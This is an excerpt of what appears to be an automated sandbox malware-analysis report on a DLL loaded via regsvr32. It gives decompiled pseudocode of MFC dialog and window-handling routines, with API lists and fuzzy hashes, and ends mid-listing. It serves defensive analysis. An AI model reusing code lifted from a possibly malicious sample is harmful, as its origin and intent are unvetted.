                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                        • API String ID: 667068680-3617302793
                                                                                                        • Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                        • Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
                                                                                                        • Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                        • Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t54;
                                                                                                        				void* _t58;
                                                                                                        				signed int _t59;
                                                                                                        				signed int _t63;
                                                                                                        				signed short _t71;
                                                                                                        				signed int _t84;
                                                                                                        				void* _t94;
                                                                                                        				struct HINSTANCE__* _t96;
                                                                                                        				signed int _t97;
                                                                                                        				void* _t98;
                                                                                                        				signed int _t100;
                                                                                                        				void* _t101;
                                                                                                        				void* _t102;
                                                                                                        
                                                                                                        				_t102 = __eflags;
                                                                                                        				_t94 = __edx;
                                                                                                        				_push(0x24);
                                                                                                        				E10017BF4(E10028029, __ebx, __edi, __esi);
                                                                                                        				_t100 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                        				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                        				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                        				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
                                                                                                        				_t96 =  *(_t54 + 0xc);
                                                                                                        				_t84 = 0;
                                                                                                        				_t103 =  *(_t100 + 0x58);
                                                                                                        				if( *(_t100 + 0x58) != 0) {
                                                                                                        					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
                                                                                                        					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                        					 *(_t101 - 0x18) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x18) != _t84) {
                                                                                                        					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                        					 *(_t101 - 0x1c) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x1c) != _t84) {
                                                                                                        					_t86 = _t100;
                                                                                                        					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
                                                                                                        					E1000FC04(_t84, _t96, __eflags);
                                                                                                        					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                        					 *(_t101 - 0x2c) = _t84;
                                                                                                        					 *(_t101 - 0x24) = _t84;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                        						if(__eflags != 0) {
                                                                                                        							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                        							if(__eflags != 0) {
                                                                                                        								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                        								 *(_t101 - 0x2c) = 1;
                                                                                                        								_t84 = E1000A7CE();
                                                                                                        								__eflags = _t84;
                                                                                                        								 *(_t101 - 0x24) = _t84;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_t86 = _t84;
                                                                                                        									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                        									if(__eflags != 0) {
                                                                                                        										_t86 = _t84;
                                                                                                        										__eflags = E100128F8(_t84);
                                                                                                        										if(__eflags != 0) {
                                                                                                        											_t86 = _t84;
                                                                                                        											E10012913(_t84, 0);
                                                                                                        											 *(_t101 - 0x28) = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                        					E100115DC(_t96, __eflags, _t100);
                                                                                                        					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                        					_push(_t96);
                                                                                                        					_push(_t58);
                                                                                                        					_push( *(_t101 - 0x1c));
                                                                                                        					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                        					_t97 = 0;
                                                                                                        					__eflags = _t59;
                                                                                                        					if(_t59 != 0) {
                                                                                                        						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                        						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                        							_t98 = 4;
                                                                                                        							_t71 = E10012862(_t100);
                                                                                                        							__eflags = _t71 & 0x00000100;
                                                                                                        							if((_t71 & 0x00000100) != 0) {
                                                                                                        								_t98 = 5;
                                                                                                        							}
                                                                                                        							E1000F6F2(_t100, _t98);
                                                                                                        							_t97 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						}
                                                                                                        						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                        						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                        							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                        					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                        					if( *(_t101 - 0x28) != _t97) {
                                                                                                        						E10012913(_t84, 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                        					if( *(_t101 - 0x2c) != _t97) {
                                                                                                        						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                        						if(__eflags == 0) {
                                                                                                        							SetActiveWindow( *(_t101 - 0x14));
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                        					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
                                                                                                        					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                        					if( *(_t100 + 0x58) != _t97) {
                                                                                                        						FreeResource( *(_t101 - 0x18));
                                                                                                        					}
                                                                                                        					_t63 =  *(_t100 + 0x44);
                                                                                                        					goto L31;
                                                                                                        				} else {
                                                                                                        					_t63 = _t54 | 0xffffffff;
                                                                                                        					L31:
                                                                                                        					return E10017C60(_t63);
                                                                                                        				}
                                                                                                        			}
















                                                                                                        0x1000cb74
                                                                                                        0x1000cb74
                                                                                                        0x1000cb74
                                                                                                        0x1000cb7b
                                                                                                        0x1000cb80
                                                                                                        0x1000cb82
                                                                                                        0x1000cb88
                                                                                                        0x1000cb8e
                                                                                                        0x1000cb91
                                                                                                        0x1000cb96
                                                                                                        0x1000cb99
                                                                                                        0x1000cb9b
                                                                                                        0x1000cb9e
                                                                                                        0x1000cba5
                                                                                                        0x1000cbb6
                                                                                                        0x1000cbbc
                                                                                                        0x1000cbbc
                                                                                                        0x1000cbc2
                                                                                                        0x1000cbc7
                                                                                                        0x1000cbcd
                                                                                                        0x1000cbcd
                                                                                                        0x1000cbd3
                                                                                                        0x1000cbdd
                                                                                                        0x1000cbe4
                                                                                                        0x1000cbe7
                                                                                                        0x1000cbec
                                                                                                        0x1000cbef
                                                                                                        0x1000cbf2
                                                                                                        0x1000cbf5
                                                                                                        0x1000cbf8
                                                                                                        0x1000cc00
                                                                                                        0x1000cc03
                                                                                                        0x1000cc0e
                                                                                                        0x1000cc10
                                                                                                        0x1000cc17
                                                                                                        0x1000cc1d
                                                                                                        0x1000cc29
                                                                                                        0x1000cc2b
                                                                                                        0x1000cc2d
                                                                                                        0x1000cc30
                                                                                                        0x1000cc34
                                                                                                        0x1000cc3c
                                                                                                        0x1000cc3e
                                                                                                        0x1000cc40
                                                                                                        0x1000cc47
                                                                                                        0x1000cc49
                                                                                                        0x1000cc4d
                                                                                                        0x1000cc4f
                                                                                                        0x1000cc54
                                                                                                        0x1000cc54
                                                                                                        0x1000cc49
                                                                                                        0x1000cc3e
                                                                                                        0x1000cc30
                                                                                                        0x1000cc10
                                                                                                        0x1000cc03
                                                                                                        0x1000cc5b
                                                                                                        0x1000cc60
                                                                                                        0x1000cc68
                                                                                                        0x1000cc6d
                                                                                                        0x1000cc6e
                                                                                                        0x1000cc6f
                                                                                                        0x1000cc74
                                                                                                        0x1000cc79
                                                                                                        0x1000cc7b
                                                                                                        0x1000cc7d
                                                                                                        0x1000cc7f
                                                                                                        0x1000cc83
                                                                                                        0x1000cc87
                                                                                                        0x1000cc8a
                                                                                                        0x1000cc8f
                                                                                                        0x1000cc93
                                                                                                        0x1000cc97
                                                                                                        0x1000cc97
                                                                                                        0x1000cc9b
                                                                                                        0x1000cca0
                                                                                                        0x1000cca0
                                                                                                        0x1000cca0
                                                                                                        0x1000cca2
                                                                                                        0x1000cca5
                                                                                                        0x1000ccb3
                                                                                                        0x1000ccb3
                                                                                                        0x1000cca5
                                                                                                        0x1000ccb8
                                                                                                        0x1000ccdb
                                                                                                        0x1000ccde
                                                                                                        0x1000cce4
                                                                                                        0x1000cce4
                                                                                                        0x1000cce9
                                                                                                        0x1000ccec
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf9
                                                                                                        0x1000ccfc
                                                                                                        0x1000cd04
                                                                                                        0x1000cd07
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd07
                                                                                                        0x1000cd16
                                                                                                        0x1000cd1b
                                                                                                        0x1000cd20
                                                                                                        0x1000cd23
                                                                                                        0x1000cd28
                                                                                                        0x1000cd28
                                                                                                        0x1000cd2e
                                                                                                        0x00000000
                                                                                                        0x1000cbd5
                                                                                                        0x1000cbd5
                                                                                                        0x1000cd31
                                                                                                        0x1000cd36
                                                                                                        0x1000cd36

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000CB7B
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
                                                                                                        • LockResource.KERNEL32(?,00000024,100014EC,00000000,E6B5FF6D), ref: 1000CBC7
                                                                                                        • GetDesktopWindow.USER32 ref: 1000CBFA
                                                                                                        • IsWindowEnabled.USER32(?), ref: 1000CC08
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 1000CC17
                                                                                                          • Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901
                                                                                                          • Part of subcall function 10012913: EnableWindow.USER32(?,E6B5FF6D), ref: 10012920
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                        • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,E6B5FF6D), ref: 1000CD0C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,E6B5FF6D), ref: 1000CD28
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1509511306-0
                                                                                                        • Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                        • Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
                                                                                                        • Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                        • Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                        				void* _t33;
                                                                                                        				void* _t34;
                                                                                                        				void* _t40;
                                                                                                        				void* _t43;
                                                                                                        				void* _t60;
                                                                                                        				void* _t64;
                                                                                                        				struct HWND__* _t66;
                                                                                                        				CHAR* _t68;
                                                                                                        				void* _t71;
                                                                                                        
                                                                                                        				_t64 = __edx;
                                                                                                        				_t60 = __ecx;
                                                                                                        				_push(0x40);
                                                                                                        				E10017BF4(E1002864B, __ebx, __edi, __esi);
                                                                                                        				_t66 =  *(_t71 + 8);
                                                                                                        				_t68 = "AfxOldWndProc423";
                                                                                                        				_t31 = GetPropA(_t66, _t68);
                                                                                                        				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                        				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                        				 *(_t71 - 0x18) = _t31;
                                                                                                        				_t58 = 1;
                                                                                                        				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                        				if(_t33 == 0) {
                                                                                                        					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                        					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_t40 = _t33 - 0x1a;
                                                                                                        					if(_t40 == 0) {
                                                                                                        						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                        						L9:
                                                                                                        						if(_t58 != 0) {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t43 = _t40 - 0x62;
                                                                                                        						if(_t43 == 0) {
                                                                                                        							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                        							RemovePropA(_t66, _t68);
                                                                                                        							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                        							goto L10;
                                                                                                        						} else {
                                                                                                        							if(_t43 != 0x8e) {
                                                                                                        								L10:
                                                                                                        								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                        							} else {
                                                                                                        								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                        								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                        								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10017C60( *(_t71 - 0x14));
                                                                                                        			}













                                                                                                        0x10011245
                                                                                                        0x10011245
                                                                                                        0x10011245
                                                                                                        0x1001124c
                                                                                                        0x10011251
                                                                                                        0x10011254
                                                                                                        0x1001125b
                                                                                                        0x10011261
                                                                                                        0x10011265
                                                                                                        0x10011269
                                                                                                        0x10011271
                                                                                                        0x10011272
                                                                                                        0x10011275
                                                                                                        0x1001131e
                                                                                                        0x10011330
                                                                                                        0x00000000
                                                                                                        0x1001127b
                                                                                                        0x1001127b
                                                                                                        0x1001127e
                                                                                                        0x10011316
                                                                                                        0x10011335
                                                                                                        0x10011337
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011280
                                                                                                        0x10011280
                                                                                                        0x10011283
                                                                                                        0x100112dc
                                                                                                        0x100112e4
                                                                                                        0x100112f2
                                                                                                        0x00000000
                                                                                                        0x10011285
                                                                                                        0x1001128a
                                                                                                        0x10011339
                                                                                                        0x1001134c
                                                                                                        0x10011290
                                                                                                        0x100112a1
                                                                                                        0x100112be
                                                                                                        0x100112c6
                                                                                                        0x100112c6
                                                                                                        0x1001128a
                                                                                                        0x10011283
                                                                                                        0x1001127e
                                                                                                        0x100112d3

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1001124C
                                                                                                        • GetPropA.USER32 ref: 1001125B
                                                                                                        • CallWindowProcA.USER32 ref: 100112B5
                                                                                                          • Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
                                                                                                          • Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138
                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
                                                                                                        • RemovePropA.USER32 ref: 100112E4
                                                                                                        • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 100112EB
                                                                                                        • GlobalDeleteAtom.KERNEL32 ref: 100112F2
                                                                                                          • Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871
                                                                                                        • CallWindowProcA.USER32 ref: 10011346
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                        • String ID: AfxOldWndProc423
                                                                                                        • API String ID: 2702501687-1060338832
                                                                                                        • Opcode ID: 9ee1106b5f5d5336c81e687cb8c924b5e08a077892bd92312de1f56c1740729b
                                                                                                        • Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
                                                                                                        • Opcode Fuzzy Hash: 9ee1106b5f5d5336c81e687cb8c924b5e08a077892bd92312de1f56c1740729b
                                                                                                        • Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t65;
                                                                                                        				signed int _t72;
                                                                                                        				signed int _t74;
                                                                                                        				struct HWND__* _t75;
                                                                                                        				signed int _t78;
                                                                                                        				signed int _t95;
                                                                                                        				intOrPtr* _t103;
                                                                                                        				signed int _t110;
                                                                                                        				void* _t124;
                                                                                                        				signed int _t129;
                                                                                                        				DLGTEMPLATE* _t130;
                                                                                                        				struct HWND__* _t131;
                                                                                                        				void* _t132;
                                                                                                        
                                                                                                        				_t128 = __esi;
                                                                                                        				_t124 = __edx;
                                                                                                        				_t104 = __ecx;
                                                                                                        				_push(0x3c);
                                                                                                        				E10017BF4(E1002800E, __ebx, __edi, __esi);
                                                                                                        				_t103 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                        				_t136 =  *(_t132 + 0x10);
                                                                                                        				if( *(_t132 + 0x10) == 0) {
                                                                                                        					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                        				}
                                                                                                        				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                        				 *(_t132 - 0x28) = _t129;
                                                                                                        				 *(_t132 - 0x14) = 0;
                                                                                                        				 *(_t132 - 4) = 0;
                                                                                                        				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                        				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                        				if(_t129 == 0) {
                                                                                                        					_t130 =  *(_t132 + 8);
                                                                                                        					L7:
                                                                                                        					__eflags = _t130;
                                                                                                        					if(_t130 == 0) {
                                                                                                        						L4:
                                                                                                        						_t65 = 0;
                                                                                                        						L32:
                                                                                                        						return E10017C60(_t65);
                                                                                                        					}
                                                                                                        					E10009E23(_t132 - 0x1c, E10013479());
                                                                                                        					 *(_t132 - 4) = 1;
                                                                                                        					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                        					__eflags =  *0x1005aa84; // 0x0
                                                                                                        					_t72 = 0 | __eflags == 0x00000000;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						L14:
                                                                                                        						__eflags = _t72;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							L17:
                                                                                                        							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                        							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                        							E100115DC(0, __eflags, _t103);
                                                                                                        							_t74 =  *(_t132 + 0xc);
                                                                                                        							__eflags = _t74;
                                                                                                        							if(_t74 != 0) {
                                                                                                        								_t75 =  *(_t74 + 0x20);
                                                                                                        							} else {
                                                                                                        								_t75 = 0;
                                                                                                        							}
                                                                                                        							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
                                                                                                        							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                        							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                        							_t110 =  *(_t132 - 0x28);
                                                                                                        							__eflags = _t110;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                        								__eflags = _t131;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t78 = E1000FC04(_t103, 0, __eflags);
                                                                                                        							__eflags = _t78;
                                                                                                        							if(_t78 == 0) {
                                                                                                        								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							if(_t131 != 0) {
                                                                                                        								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                        								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                        									DestroyWindow(_t131);
                                                                                                        									_t131 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							__eflags =  *(_t132 - 0x14);
                                                                                                        							if( *(_t132 - 0x14) != 0) {
                                                                                                        								GlobalUnlock( *(_t132 - 0x14));
                                                                                                        								GlobalFree( *(_t132 - 0x14));
                                                                                                        							}
                                                                                                        							__eflags = _t131;
                                                                                                        							_t59 = _t131 != 0;
                                                                                                        							__eflags = _t59;
                                                                                                        							_t65 = 0 | _t59;
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						L15:
                                                                                                        						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                        						 *(_t132 - 4) = 2;
                                                                                                        						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                        						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
                                                                                                        						 *(_t132 - 4) = 1;
                                                                                                        						E100146C9(_t132 - 0x38);
                                                                                                        						__eflags =  *(_t132 - 0x14);
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                        						}
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags = _t72;
                                                                                                        					if(_t72 != 0) {
                                                                                                        						goto L15;
                                                                                                        					}
                                                                                                        					__eflags = GetSystemMetrics(0x2a);
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
                                                                                                        					__eflags = _t95;
                                                                                                        					_t72 = 0 | _t95 == 0x00000000;
                                                                                                        					__eflags = _t72;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L17;
                                                                                                        					}
                                                                                                        					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                        					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                        						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                        					}
                                                                                                        					goto L14;
                                                                                                        				}
                                                                                                        				_push(_t132 - 0x48);
                                                                                                        				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                        					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				goto L4;
                                                                                                        			}
















                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c984
                                                                                                        0x1000c98b
                                                                                                        0x1000c990
                                                                                                        0x1000c992
                                                                                                        0x1000c997
                                                                                                        0x1000c99a
                                                                                                        0x1000c9a4
                                                                                                        0x1000c9a4
                                                                                                        0x1000c9ac
                                                                                                        0x1000c9b1
                                                                                                        0x1000c9b4
                                                                                                        0x1000c9b7
                                                                                                        0x1000c9ba
                                                                                                        0x1000c9c4
                                                                                                        0x1000c9cb
                                                                                                        0x1000c9f8
                                                                                                        0x1000c9fb
                                                                                                        0x1000c9fb
                                                                                                        0x1000c9fd
                                                                                                        0x1000c9df
                                                                                                        0x1000c9df
                                                                                                        0x1000cb6c
                                                                                                        0x1000cb71
                                                                                                        0x1000cb71
                                                                                                        0x1000ca08
                                                                                                        0x1000ca16
                                                                                                        0x1000ca1a
                                                                                                        0x1000ca27
                                                                                                        0x1000ca2c
                                                                                                        0x1000ca32
                                                                                                        0x1000ca34
                                                                                                        0x1000ca6a
                                                                                                        0x1000ca6a
                                                                                                        0x1000ca6c
                                                                                                        0x1000caad
                                                                                                        0x1000caad
                                                                                                        0x1000cab1
                                                                                                        0x1000cab6
                                                                                                        0x1000cabb
                                                                                                        0x1000cabe
                                                                                                        0x1000cac0
                                                                                                        0x1000cac6
                                                                                                        0x1000cac2
                                                                                                        0x1000cac2
                                                                                                        0x1000cac2
                                                                                                        0x1000cae0
                                                                                                        0x1000cae2
                                                                                                        0x1000cae7
                                                                                                        0x1000cb09
                                                                                                        0x1000cb0c
                                                                                                        0x1000cb0e
                                                                                                        0x1000cb16
                                                                                                        0x1000cb19
                                                                                                        0x1000cb1b
                                                                                                        0x1000cb22
                                                                                                        0x1000cb22
                                                                                                        0x1000cb1b
                                                                                                        0x1000cb28
                                                                                                        0x1000cb2d
                                                                                                        0x1000cb2f
                                                                                                        0x1000cb35
                                                                                                        0x1000cb35
                                                                                                        0x1000cb3b
                                                                                                        0x1000cb3d
                                                                                                        0x1000cb3f
                                                                                                        0x1000cb43
                                                                                                        0x1000cb46
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb4c
                                                                                                        0x1000cb43
                                                                                                        0x1000cb4e
                                                                                                        0x1000cb51
                                                                                                        0x1000cb56
                                                                                                        0x1000cb5f
                                                                                                        0x1000cb5f
                                                                                                        0x1000cb67
                                                                                                        0x1000cb69
                                                                                                        0x1000cb69
                                                                                                        0x1000cb69
                                                                                                        0x00000000
                                                                                                        0x1000cb69
                                                                                                        0x1000ca6e
                                                                                                        0x1000ca72
                                                                                                        0x1000ca7d
                                                                                                        0x1000ca81
                                                                                                        0x1000ca91
